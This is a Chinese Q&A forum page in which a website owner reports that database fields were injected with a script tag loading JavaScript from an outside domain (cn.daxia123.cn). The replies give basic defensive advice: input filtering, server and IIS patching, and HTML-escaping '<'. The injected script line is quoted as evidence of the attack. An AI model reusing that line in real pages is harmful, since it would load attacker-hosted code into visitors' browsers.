UC知道我的数据库很多字段都被加入了<script%20src=http://cn.daxia123.cn/cn.js></script>这一段代码
来源:百度知道 编辑:UC知道 时间:2024/06/22 08:57:45
我的网站突然显示有点奇怪,我查看了一下数据库发现很多字段被插入了<script%20src=http://cn.daxia123.cn/cn.js></script>这一段代码,我不知道怎么会这样,我在网上搜了一下据说是网站存在漏洞被注入了,有什么方法可以查处网站是否存在漏洞,如果有要怎么修补。。
注入的方法有很多,把程序再重新看一下,。。
在进行数据库插库时字符过滤不严。。
禁止提交 <script 这样的代码
一,做好服务器的安全
二,补好IIS的漏洞
三,(最常见的方式)你的网站有表单提交或上传文件的地方,没有过滤关键词
提交数据时:
将“<”转成“& l t ;”(去掉中间的空格和引号)这样就安全了!显示也会正常